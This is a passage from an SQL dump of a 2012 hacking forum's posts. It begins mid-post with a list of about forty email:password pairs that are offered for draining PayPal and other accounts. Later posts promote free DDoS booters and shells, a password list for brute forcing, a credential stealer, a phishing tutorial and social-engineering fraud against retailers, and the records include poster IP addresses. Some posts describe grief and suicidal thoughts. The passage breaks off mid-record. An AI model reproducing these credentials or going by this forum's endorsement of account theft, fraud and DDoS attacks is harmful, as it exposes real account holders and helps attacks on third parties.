isaiv@gmail.com:13101974\nnitinbscit@gmail.com:17968159\nrpreddy369@gmail.com:9989888369\nnjm.zafar@gmail.com:45268191\nruiz1958@gmail.com:santosfc\nraj.dipak@gmail.com:nokia3220\ns.anandhassan@gmail.com:thegameison\nsampulsar18@gmail.com:samrockseverywhere\npsn20042001@gmail.com:simran\nsashankb51@gmail.com:282039\nnoopuragarwal24056@gmail.com:usenthrow\nramssiru@gmail.com:sirumugai\nsarkar.jayanta@gmail.com:jayanta01\npedro.lagoela@gmail.com:pr0088lago\nprogrammingservices.ht@gmail.com:hitech12\nshh.sugu@gmail.com:sugu1985\nphilip.dragoumis@gmail.com:wpelican\npandajsr@gmail.com:panda123\nrehan.pari@gmail.com:9825619003\npramsnr@gmail.com:251142\nprasobh917@gmail.com:9747367917\npoolguy24@gmail.com:pa55w0rd\nsahilcool1994@gmail.com:sahilmunshi\nravikhatrilovesu@gmail.com:BravoAco11\npoiteviencarlos@gmail.com:TMOPASGT\nnoor198499@gmail.com:naseemjabeen\nniraj85shah@gmail.com:gatudarling\nrafiqaalaayi@gmail.com:teampower\npyemabraham@gmail.com:maar666999\nsagarkakad007@gmail.com:s@g@ruk409\nshahe7005@gmail.com:mahsoodd5\npcmpal@gmail.com:pal007\nnasirequbal14@gmail.com:14119918\nraseeth.06@gmail.com:hteesar6\nniatmir.nestle@gmail.com:ya123456\nrvndr8@gmail.com:xiphias0101\nphoenix.hayhay@gmail.com:fcmonkey123\ns.rajakumar.be@gmail.com:sbvr1234\nridagold@gmail.com:rickyhot\npremkumargaddala@gmail.com:bujjigadu[/quote]\n[/spoiler]\n\nYou can use this info to check their Paypal for some $$ or some accounts, etc. Don\'t know what you wil find on the emails. Good luck.\n\nUnchecked/Untested.', '24.212.197.164', '416597412', '1', '0', '82', '1349051758', '1', 'a5459c2361eafd735b736d943a463e93', '0', '1349051758'); INSERT INTO mybb_posts VALUES('3057', '632', '3056', '61', 'RE: 1000 Emails Dump', '0', '9', 'p420', '1349051768', 'FUCK!! That\'s hell of a lot logins thanks.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '6184e81e47a328bf0be94ca23d79bbd8', '0', '0'); INSERT INTO mybb_posts VALUES('3058', '482', '2343', '61', 'RE: 3 Million Password List', '0', '9', 'p420', '1349051800', 'We can use this for brute forcing right?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '9f454785e71c498faf0e6ad5fc1f11fd', '0', '0'); INSERT INTO mybb_posts VALUES('3059', '626', '3020', '19', 'RE: ?? Best Free Private DoS Shells ?? 57 Private Free Shells', '0', '9', 'p420', '1349051833', 'Thanks im planning to make a online booter.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'e0984fde4797febad878cd413f19ba2d', '0', '0'); INSERT INTO mybb_posts VALUES('3060', '633', '0', '19', '[Junk]JOKER!!!!!!!!???????!!!!!!!!!!', '0', '3', '??????????¢™', '1349051866', '[b]HAHAH LOOK AT JOKER[/b]\r\n[spoiler][img]http://thefatbrat.com/wp-content/uploads/2012/01/face.png[/img][/spoiler]', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', 'dca97bda8c3d4ac8d69650bad5d9197a', '0', '0'); INSERT INTO mybb_posts VALUES('3061', '610', '2971', '61', 'RE: Free Skype Resolver - Fast Resolve!', '0', '9', 'p420', '1349051871', 'Link is dead. Please fix the link.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a63d88bbe9c62238bee841b08737a57b', '0', '0'); INSERT INTO mybb_posts VALUES('3062', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1349051978', 'http://l33thacking.net/thread-534.html', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', 'f42aa9f4c63a55f240d694f80ab20e7d', '0', '0'); INSERT INTO mybb_posts VALUES('3063', '574', '2818', '61', 'RE: Clean Thread Design', '0', '9', 'p420', '1349051980', 'I think you should provide some credits and nice guide.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '20d23e5b8b2f6431d87ed78349158481', '0', '0'); INSERT INTO mybb_posts VALUES('3064', '633', '3060', '19', 'RE: JOKER!!!!!!!!???????!!!!!!!!!!', '0', '1', 't3h jok3r', '1349052027', 'Lol you made a laugh. Who\'s next to me? YOU!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1537672d5dd6627cf9e577fa139cb25e', '0', '0'); INSERT INTO mybb_posts VALUES('3065', '633', '3060', '19', 'RE: JOKER!!!!!!!!???????!!!!!!!!!!', '0', '3', '??????????¢™', '1349052066', 'LMFAO\n[hr]\nThis thread has been junked.', '75.35.239.228', '1260646372', '1', '0', '3', '1349052070', '1', 'badd4155a376dfc7239de18b49530eb4', '0', '0'); INSERT INTO mybb_posts VALUES('3066', '574', '2818', '61', 'RE: Clean Thread Design', '0', '82', 'iTzIpod', '1349052109', 'Thanks :p \n\nI\'ll take that under consideration xD\nJk. I\'ll add them tomorrow if I don\'t forget.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1d87717dab011cb9f8964e158744ea8b', '0', '0'); INSERT INTO mybb_posts VALUES('3067', '632', '3056', '61', 'RE: 1000 Emails Dump', '0', '82', 'iTzIpod', '1349052152', 'No problem! Enjoy!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '80c6fab32b51e68ecf7d707d4da96f2c', '0', '0'); INSERT INTO mybb_posts VALUES('3068', '482', '2343', '61', 'RE: 3 Million Password List', '0', '82', 'iTzIpod', '1349052186', 'Yes you can. That\'s basically the reason why I just uploaded that.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cfb016f3e262b23455cde757924ada0a', '0', '0'); INSERT INTO mybb_posts VALUES('3069', '610', '2971', '61', 'RE: Free Skype Resolver - Fast Resolve!', '0', '82', 'iTzIpod', '1349052243', 'My friend told me it was DDoSed. So that\'s why it\'s down.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8bf18f34c5257cfeafe4102c41eae596', '0', '0'); INSERT INTO mybb_posts VALUES('3070', '626', '3020', '19', 'RE: ?? Best Free Private DoS Shells ?? 57 Private Free Shells', '0', '82', 'iTzIpod', '1349052284', 'Lol GRONGamer61 will need that :p He wants to test my shells.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fc83ab9cbeca353d511d768b9808e423', '0', '0'); INSERT INTO mybb_posts VALUES('3071', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349052320', 'http://37.128.191.200/ :p \n\nWas giving this out to a friend.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8ce570ac4c3016ccd93aea11e691e61e', '0', '0'); INSERT INTO mybb_posts VALUES('3072', '190', '665', '56', 'RE: Copy and paste game', '0', '1', 't3h jok3r', '1349052495', 'gavmaXXX\n\nSomeones Skype ID :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cca975030bfcd49fba6cca0d3895ffe7', '0', '0'); INSERT INTO mybb_posts VALUES('3078', '626', '3020', '19', 'RE: ?? Best Free Private DoS Shells ?? 57 Private Free Shells', '0', '100', '??zg???g????61', '1349054423', 'Hey hey hey ;D hit me up with these? ;D Thanks', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '2765e489aa7a3cf484a3ae36cab4bde3', '0', '0'); INSERT INTO mybb_posts VALUES('3074', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '199', 'Anonymous™', '1349053365', 'Thank you for sharing this with us NeonLights.', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '620b3d77b34c7c94cda6500d3642fcec', '0', '0'); INSERT INTO mybb_posts VALUES('3075', '634', '0', '7', 'Depressed', '5', '203', 'NeonLights', '1349053684', 'i fucking hate my life\r\nsome days i feel like commiting suicide\r\nwhy did u have to leave me mom :(\r\nu meant so much to me. \r\nwithout you life has been difficult and i feel like theres no more meaning for me to be here...\r\n\r\nif only i saw u one more time... my life would change completely\r\n\r\n09/28/2012 a day that i will never forget :\'(', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '1ca2369a19660905338717088a44244b', '0', '0'); INSERT INTO mybb_posts VALUES('3076', '634', '3075', '7', 'RE: Depressed', '0', '1', 't3h jok3r', '1349053845', 'I feel sorry for you man. You have to move on with life.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '10817c0fb318c18463ac83b4bd85a732', '0', '0'); INSERT INTO mybb_posts VALUES('3077', '634', '3076', '7', 'RE: Depressed', '0', '203', 'NeonLights', '1349053961', '[quote=\'t3h jok3r\' pid=\'3076\' dateline=\'1349053845\']\r\nI feel sorry for you man. You have to move on with life.\r\n[/quote]\r\n\r\ni know but its hard :(\r\nit makes it harder at school :(\r\ni keep having images from at the hospital when she was lying there :(\r\n\r\ni just cant stop thinking about it, its messing me up :\'( :\'( :\'(', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '92b2e48575fceb8f72212c7bfd953fc0', '0', '0'); INSERT INTO mybb_posts VALUES('3079', '634', '3075', '7', 'RE: Depressed', '0', '82', 'iTzIpod', '1349055369', 'Dude. To be honest, I\'m really depressed too. I was having suicidal thoughts from yesterday. I even had a dream I killed myself last night.\nI\'m having relationship problems with my ex.. And I gotta learn the hard way.. Which was to move and and forget.. \n\nI feel you dude.\nStay in there.\n\nStay strong. :/\n\nSame goes for me aswell.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '079c0a33a20cbb8f690fb7b988a6bc30', '0', '0'); INSERT INTO mybb_posts VALUES('3080', '634', '3079', '7', 'RE: Depressed', '0', '203', 'NeonLights', '1349055427', '[quote=\'iTzIpod\' pid=\'3079\' dateline=\'1349055369\']\r\nDude. To be honest, I\'m really depressed too. I was having suicidal thoughts from yesterday. I even had a dream I killed myself last night.\r\nI\'m having relationship problems with my ex.. And I gotta learn the hard way.. Which was to move and and forget.. \r\n\r\nI feel you dude.\r\nStay in there.\r\n\r\nStay strong. :/\r\n\r\nSame goes for me aswell.\r\n[/quote]\r\n\r\nim sorry to hear of that :(\r\n&\r\nthx', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'fffac6c143d24d6d0bc7f9d29d3f34a2', '0', '0'); INSERT INTO mybb_posts VALUES('3081', '626', '3020', '19', 'RE: ?? Best Free Private DoS Shells ?? 57 Private Free Shells', '0', '82', 'iTzIpod', '1349059607', 'iTzGRONgamer61 just try using another online booter. :p \n\n\nOr download one?\n\nJay\'s booter? Etc :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f60307103b0df9e89ae9eebe651b4af4', '0', '0'); INSERT INTO mybb_posts VALUES('3082', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349060570', 'http://www.listenonrepeat.com/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b1a3a23bc657da1d85b5f4876ffdc887', '0', '0'); INSERT INTO mybb_posts VALUES('3083', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '82', 'iTzIpod', '1349060600', 'Thanks for the share dude.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1d0edfb1dc9de32b5a9dd4cc9d516089', '0', '0'); INSERT INTO mybb_posts VALUES('3084', '634', '3075', '7', 'RE: Depressed', '0', '82', 'iTzIpod', '1349060695', 'No problem. Just trying to help out another bro. Good luck.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '39b27cea41aadda086d4cf1772e5e773', '0', '0'); INSERT INTO mybb_posts VALUES('3085', '635', '0', '7', '[Milestone] L33tHacking Forum Total 3,000 Posts', '0', '82', 'iTzIpod', '1349061044', 'Woah\r\nGood job guys. We reached 3,000 posts.\r\nI\'m impressed! :D\r\n\r\nI would like to thank everyone. And I mean EVERYONE. Who posted. Each post of yours, contributed to LH. Thanks.\r\n\r\n\r\n\r\nEnjoy your day.\r\n(I\'m still depressed..)\r\n\r\n- iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e5c050fcb90dd9464ffb0746abb05de7', '0', '0'); INSERT INTO mybb_posts VALUES('3086', '622', '3013', '42', 'RE: Founder of the Pirate Bay Gottfrid Svartholm Arrested in Cambodia', '0', '3', '??????????¢™', '1349062715', 'Could you provide where you found this article?', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '9bad92805e1c63c6db0d68567245d998', '0', '0'); INSERT INTO mybb_posts VALUES('3087', '635', '3085', '7', 'RE: [Milestone] L33tHacking Forum Total 3,000 Posts', '0', '3', '??????????¢™', '1349062781', 'I am glad we hit 3,000 posts. Hopefully we could hit more posts and get more members.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '2d2aee85b193800f60587e5906ca1579', '0', '0'); INSERT INTO mybb_posts VALUES('3088', '634', '3075', '7', 'RE: Depressed', '0', '2', 'Apathy', '1349066677', 'I feel your pain I lost someone very close to me recently. :/', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', 'bb462652c8dc10876bfda0f5748dc006', '0', '0'); INSERT INTO mybb_posts VALUES('3089', '574', '2818', '61', 'RE: Clean Thread Design', '0', '2', 'Apathy', '1349066737', 'Very nice share. Thank you. :)', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', '68087c6ffd02293fb209bdcf6cee0a3e', '0', '0'); INSERT INTO mybb_posts VALUES('3090', '625', '3019', '61', 'RE: Runescape Phishing Tutorial', '0', '2', 'Apathy', '1349066976', 'Awesome share thanks. I will probably give this a go.', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', '54022da57581eea8da197cda58e1f650', '0', '0'); INSERT INTO mybb_posts VALUES('3091', '636', '0', '15', 'Free Host Booter', '0', '207', 'Combat', '1349069555', 'http://inteltwo.com/misc.php?page=booter75611.php\r\n\r\nIt is free and web-based with no login, and has IP recoginition.\r\n\r\nThis was originally released in the beta form by RabidGhost to IntelTwo for testing. But the DB was ripped and released to the public. Many people may find out about this so attacks may be limited.\r\n\r\n[u]Non-Upgraded Users[/u]\r\n10 Seconds of Lag, 80 bot shells = 1-2 minute downtime\r\n\r\n[u]Upgraded Users[/u]\r\n500 Seconds of Lag, 300 bot shells = 30 minutes downtime', '76.28.177.62', '1276948798', '0', '0', '0', '0', '1', 'c571adc823c8fd123f578e6ad3978fc6', '0', '0'); INSERT INTO mybb_posts VALUES('3092', '634', '3075', '7', 'RE: Depressed', '0', '62', 'R?????zo?', '1349073524', 'sucks to hear that bro :(\nim sorry for you, I don\'t know that pain you feeling though but I wish I could help in some way though :/', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'cc2df5f7f7670bfc0153c29fff44cb12', '0', '0'); INSERT INTO mybb_posts VALUES('3093', '635', '3085', '7', 'RE: [Milestone] L33tHacking Forum Total 3,000 Posts', '0', '199', 'Anonymous™', '1349085229', 'It really shows that the community is growing.', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '9205ae1513e8f3496b941f0fe7a0d024', '0', '0'); INSERT INTO mybb_posts VALUES('3094', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1349085331', 'http://www.tubeplus.me/player/516421/Ted/', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '1258088f0b95f3e575cb6c2a08bde980', '0', '0'); INSERT INTO mybb_posts VALUES('3095', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349089955', 'http://l33thacking.net/thread-574.html', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9827a1f35985d7b00f8d3b3142890c32', '0', '0'); INSERT INTO mybb_posts VALUES('3096', '574', '2818', '61', 'RE: Clean Thread Design', '0', '82', 'iTzIpod', '1349090000', 'No problem! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7dfaeab9384a175e353a2f91b06060cf', '0', '0'); INSERT INTO mybb_posts VALUES('3097', '625', '3019', '61', 'RE: Runescape Phishing Tutorial', '0', '82', 'iTzIpod', '1349090043', 'Good luck! And no problem.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '769615be89832393828a5b517e672403', '0', '0'); INSERT INTO mybb_posts VALUES('3098', '637', '0', '16', 'I need to SE a gaming keyboard', '0', '62', 'R?????zo?', '1349092111', 'my current keyboard is old and almost broken, I need a good one but they are expensive for my pocket, I heard logitech is easy but I\'ve never SE\'ed anything in my life. \nwhat\'s your thoughts on this?\nI might be able to pay 40-50% of the price if someone could do this for me, if it\'s a REALLY good keyboard.\n\nNOTE: I will only pay once I got the item.', '94.132.244.168', '1585771688', '1', '0', '62', '1349092150', '1', '0680196e8cff8dfeccbabedc24fafbe2', '0', '1349092150'); INSERT INTO mybb_posts VALUES('3100', '637', '3098', '16', 'RE: I need to SE a gaming keyboard', '0', '82', 'iTzIpod', '1349092457', 'I know a friend that can do it for $10 :p\n\nOr I can do it free.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b560197a4905c5d98c614033dde826ec', '0', '0'); INSERT INTO mybb_posts VALUES('3102', '638', '0', '61', '100k+ Proxy List', '0', '82', 'iTzIpod', '1349092741', 'Hey L33tHacking! \r\niTzIpod here giving away a special .txt file (Notepad) and it contains 100k+ (100,000+) Proxies! :D\r\n\r\n\r\nTo view: http://adf.ly/DKotr\r\nTo download: http://adf.ly/DKp5L', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '391d91ef7a995abf1ea72e7a084f5d3a', '0', '0'); INSERT INTO mybb_posts VALUES('3103', '637', '3098', '16', 'RE: I need to SE a gaming keyboard', '0', '62', 'R?????zo?', '1349096159', 'that would be awesome, can your friend SE any keyboard?\nI wouldn\'t mind paying $10 if it\'s worth it.\nand for free what can you SE?', '46.50.95.167', '775053223', '1', '0', '0', '0', '1', 'a80312b6c4210e9ebd1727c3a3752517', '0', '0'); INSERT INTO mybb_posts VALUES('3104', '431', '3000', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1349098046', '[quote=\'iTzGRONgamer61\' pid=\'3000\' dateline=\'1349029835\']\nHeyo, could I have a sig made for myself? Could i have \"GRONgamer61\'s DDoS\'ing Service $4/Hour\", in black and red letters. I\'d like the font to look retro and shiny ;D\n[/quote]\n\nnot sure if you wanted something like this\n\n[img]http://i.imgur.com/b6ooB.gif[/img]\n\nI know you wanted red but it didn\'t look too good.', '31.22.163.234', '521577450', '1', '0', '62', '1349098511', '1', 'd82499164d38ca9b92a3a8bfab3b1208', '0', '1349098511'); INSERT INTO mybb_posts VALUES('3105', '609', '2944', '58', 'RE: Gamers Recruitment', '0', '61', 'NXK', '1349099601', 'I Guess no one wants to join lol :(\r\n\r\nI\'m pretty much going to accept any application if you game.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '752a390c80f8eac7cf676fbe2fea892e', '0', '0'); INSERT INTO mybb_posts VALUES('3106', '609', '2944', '58', 'RE: Gamers Recruitment', '0', '62', 'R?????zo?', '1349100022', 'Username: reloadz0r\nName: Antonio\nAge: 20\nProfile: http://l33thacking.net/user-62.html\nWhy I should join Gamers: I been into gaming for a quite few years now, mostly FPS. I\'ve played since CoD1 up to CoD:MW2, played at competion/LAN level, I\'ve won few LAN party\'s with my old clan, recently I decided to quit FPS and moved on to MMO\'s. I play abit of CS:GO still :)\nWhat I can contribute in the group: I can provide tips and tricks from an experienced player,help the others solving problems, bugs. Also can do some GFX work if needed.', '31.22.163.234', '521577450', '1', '0', '0', '0', '1', 'd33593d50964e9ac4f167ff3e333e140', '0', '0'); INSERT INTO mybb_posts VALUES('3107', '639', '0', '66', '[News] Updates,Releases,Edits', '0', '61', 'NXK', '1349100608', 'I will be starting to add content tonight. If anyone else would like to contribute when I get more members in the group that would be nice.\r\n\r\nId love to see some gaming tutorials.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', 'b7f44867bf98be552c2396a069cc68a5', '0', '0'); INSERT INTO mybb_posts VALUES('3108', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '61', 'NXK', '1349100667', 'I\'ve had a panel for this stealer set up for awhile, It\'s nice.\r\n\r\nGlad to see other members know about it.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', 'b243f51ac53d725892111abb76c8132a', '0', '0'); INSERT INTO mybb_posts VALUES('3109', '640', '0', '21', 'sad', '0', '100', '??zg???g????61', '1349104320', 'asdadfsdFsdfasdfsdfdsjafffffffffffffffffffffffffffffffffffffffffffffffff', '46.249.57.80', '788085072', '1', '0', '0', '0', '-2', '9dade78a5371512e93ab4f0e6eaaa0b2', '0', '0'); INSERT INTO mybb_posts VALUES('3110', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1349104942', '=ur:WindowsLiveID&wctx=wa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1349104863%26rver%3D6.1.6206.0%26wp%3DMBI%26wreply%3Dhttp:%252F%252Fmail.com%252Fdefault.aspx%26lc%3D1053%26id%3D64855%26mkt%3Dsv-se%26cbcxt%3Dmai%26snsc%3D1%26bk%3D1349104863\',t:\'Hotmail\',u:\'\',v:\'\',aa:\'https://graphics.hotmail.com/mail/w3/ltr/loginimages/m3_login_sv.jpg\',ab:\'https://secure.shared.live.com/~Live.SiteContent.Explore/~15.40.70/header/mai/SV-SE/header.html?id=64855&mkt=SV-SE&cbcxt=mai\',w:false,ac:\'\',urlPost:\'https://login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1349104863&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1053&id=64855&mkt=sv-se&cbcxt=mai&snsc=1&bk=1349104863\',C:\'\',html:[],ad:\'http://login.live.com/gls.srf?urlID=WLHelpCentral&mkt=SV-SE&vv=1350\',D:null,ae:\'\',Aa:\"&copy;2012 Microsoft\",str:[],z:\'\',F:{},af:\'http://go.microsoft.com/fwlink/?LinkID=254486\',Ab:\'\',sErrTxt:\'\',ag:\'https://login.live.com/ppsecure/secure.srf?wa=wsignin1.0&rpsnv=11&ct=1349104863&rver=6.1.6206.0&wp=MBI&wrep', '85.230.50.38', '1441149478', '1', '0', '199', '1349105016', '1', '37d1da8fcae2c1d6d795834b2f0acb32', '0', '1349105016'); INSERT INTO mybb_posts VALUES('3111', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '62', 'R?????zo?', '1349105223', 'I mean I can try again for you if you are more specific, for free..\nI will animate it.', '31.22.163.234', '521577450', '1', '0', '0', '0', '1', '78b4c49c4b354cbe8d0cd34ec9518ac9', '0', '0'); INSERT INTO mybb_posts VALUES('3112', '608', '2943', '66', 'RE: Welcome To Gamers!', '0', '62', 'R?????zo?', '1349105343', 'GamerTag - N/A\nPSN - durooo (i dont play much)\nSteam - r3loadz0r\nSkype - josejose6099', '31.22.163.234', '521577450', '1', '0', '0', '0', '1', '5520caf2934cd5ac6cff185277290bb9', '0', '0'); INSERT INTO mybb_posts VALUES('3113', '641', '0', '42', 'File-Sharing for Personal Use Declared Legal in Portugal', '0', '62', 'R?????zo?', '1349106003', 'Hoping to curb the ever-increasing piracy figures in Portugal, local anti-piracy outfit ACAPOR reported the IP-addresses of 2,000 alleged file-sharers to the Attorney General last year. This week the Portuguese prosecutor came back with a ruling and decided not to go after the individuals connected to the IP-addresses. According to the prosecutor it is not against the law to share copyrighted works for personal use, and an IP-address is not enough evidence to identify a person.\n\nWearing T-shirts with the slogan “Piracy is Illegal”, the movie industry sponsored anti-piracy group ACAPOR delivered several boxes full of IP-addresses of alleged ‘illegal’ file-sharers to the Attorney General’s Office last year.\n\nThe “evidence” was handed over in two batches and the group demanded the authorities act against 2,000 alleged pirates.\n\n“We are doing anything we can to alert the government to the very serious situation in the entertainment industry,” ACAPOR commented at the time, adding that “1000 complaints a month should be enough to embarrass the judiciary system.”\n\nHowever, a year later it turns out that ACAPOR’s actions have backfired and the anti-piracy group is now facing the embarrassment.\n\nACAPOR delivering the complaints\n\nThe Department of Investigation and Penal Action (DIAP) looked into the complaints and the prosecutor came back with his order this week. Contrary to what the anti-piracy group had hoped for, the 2,000 IP-addresses will not be taken to court.\n\nWorse for ACAPOR, the prosecutor goes even further by ruling that file-sharing for personal use is not against the law.\n\n“From a legal point of view, while taking into account that users are both uploaders and downloaders in these file-sharing networks, we see this conduct as lawful, even when it’s considered that the users continue to share once the download is finished.”\n\nThe prosecutor adds that the right to education, culture, and freedom of expression on the Internet should not be restricted in cases where the copyright infringements are clearly non-commercial.\n\nIn addition, the order notes that an IP-address is not a person.\n\nThe ruling explains that the person connected to the IP-address “is not necessarily the user at the moment the infringement takes place, or the user that makes available the copyrighted work, but rather the individual who has the service registered in his name, independent of whether this person using it or not”\n\nThis means that the account holders connected to these 2,000 IPs are not necessarily all copyright infringers, similar to orders we’ve seen in the United States previously.\n\nFinally, the prosecutor ruled that even if file-sharing for personal use would be seen as illegal, the artists themselves should explicitly declare that there are not authorizing copying for personal use.\n\nACAPOR boss Nuno Pereira is disappointed with the decision and he accuses the prosecutor of dropping the case because it’s the easy way out.\n\n“Personally I think the prosecutors just found a way to adapt the law to their interest – and their interest is not having to send 2,000 letters, hear 2,000 people and investigate 2,000 computers,” Pereira says.\n\nAnother way to frame it is that the prosecutor adapted the law in the interest of the public at large, which is generally speaking not a bad idea.\n\nWhile the decision is hopeful for Portuguese file-sharers, it is still a matter of how the law is interpreted. For now, however, it is save to assume that Portugal is spared from the mass-BitTorrent lawsuits we’ve seen in the United States, Germany and the UK.\n\nsource: http://torrentfreak.com/file-sharing-for-personal-use-declared-legal-in-portugal-120927/', '31.22.163.234', '521577450', '1', '0', '62', '1349198901', '1', 'e57268ae33d55f7a354d61713888f688', '0', '1349198901'); INSERT INTO mybb_posts VALUES('3195', '641', '3163', '42', 'RE: File-Sharing for Personal Use Declared Legal in Portugal', '0', '62', 'R?????zo?', '1349198919', '[quote=\'Timmy\' pid=\'3163\' dateline=\'1349143265\']\r\nThe introduction has been copied and pasted twice.\r\n[/quote]\r\n\r\nfixed it for you.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c58cafe024902e1d5269abaa8c9320d9', '0', '0'); INSERT INTO mybb_posts VALUES('3196', '649', '3179', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '82', 'iTzIpod', '1349205495', 'Just saying that to people outside of Unique. And I know that already.\nAlso noticed that Super Mods can do that too.\n\nI noticed Reborn posting in Unique. So.. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e4be9c4950b636c6a9745c707ef859be', '0', '0'); INSERT INTO mybb_posts VALUES('3197', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349205524', '27 is the next number .', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0caafe231a40a87341bdf1db384a6494', '0', '0'); INSERT INTO mybb_posts VALUES('3198', '488', '2355', '8', 'RE: What are you listening to?', '0', '82', 'iTzIpod', '1349205578', 'Listening to Owl City - Good Time', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bb6ca159f94bc1a4dead2b9dc6d295d2', '0', '0'); INSERT INTO mybb_posts VALUES('3199', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349205778', 'http://www.mediafire.com/?6xr4zha21my3agy\n\n\nHQ Thread Design :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd51145a4f4a7209f985004d41ac22c4d', '0', '0'); INSERT INTO mybb_posts VALUES('3200', '651', '0', '61', '[Free] Thread Design', '0', '82', 'iTzIpod', '1349205877', '[align=center][b]Since this is a PSD, you can edit it to look good for LH. Enjoy![/b][/align]\r\n[spoiler]\r\n[align=center][img]http://i.minus.com/iXOVnsT3iXz5g.png[/img][/align]\r\n[/spoiler]\r\n\r\n[b]Download[/b]\r\nhttp://www.mediafire.com/?6xr4zha21my3agy', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3685355ec1107d477c627ea00e125e5b', '0', '0'); INSERT INTO mybb_posts VALUES('3114', '190', '665', '56', 'RE: Copy and paste game', '0', '62', 'R?????zo?', '1349106126', 'I follow this thread everyday waiting until someone posts a pornhub link :/', '31.22.163.234', '521577450', '1', '0', '0', '0', '1', 'ea38377a58951d0a29e672a91b3af030', '0', '0'); INSERT INTO mybb_posts VALUES('3115', '642', '0', '61', '[FREE] DDOS, Cracking, Shells, Tools, phpfirewall and more!', '0', '62', 'R?????zo?', '1349107590', '[align=center]I found this recently, it has abit of everything.\r\n\r\n[size=medium][b][color=#1E90FF]What are you getting:[/color][/b][/size]\r\n\r\n[img]http://i.imgur.com/m0CFX.png[/img]\r\n\r\nDownload: http://109.163.225.194/download/files/\r\n[/align]', '31.22.163.234', '521577450', '1', '0', '0', '0', '1', 'cf5834f4b40c915ca0a3205727d8de4f', '0', '0'); INSERT INTO mybb_posts VALUES('3116', '643', '0', '7', 'L33thakcers.com members here?', '0', '213', 'BitMonst3r', '1349107675', 'Hi guys, any l33thackers.com members are here? :D \r\nI know its not the same forum, just interested.', '188.69.227.48', '-1136270544', '0', '0', '0', '0', '1', '888726af6d90f16b427c0f2b277b58d2', '0', '0'); INSERT INTO mybb_posts VALUES('3117', '637', '3098', '16', 'RE: I need to SE a gaming keyboard', '0', '82', 'iTzIpod', '1349119074', 'My friend can SE anything from Logitech. \nI can SE anything from Logitech also. But it would take a while? \n\nIf you\'re interested, add me on Skype.\n\nSkype: iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7a9510289de1cf0e1261d3fe81abd914', '0', '0'); INSERT INTO mybb_posts VALUES('3118', '643', '3116', '7', 'RE: L33thakcers.com members here?', '0', '82', 'iTzIpod', '1349119181', 'Nope. Heard of it though. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bcf0a6d7437198353670f4f0462bddb8', '0', '0'); INSERT INTO mybb_posts VALUES('3119', '608', '2943', '66', 'RE: Welcome To Gamers!', '0', '82', 'iTzIpod', '1349119219', 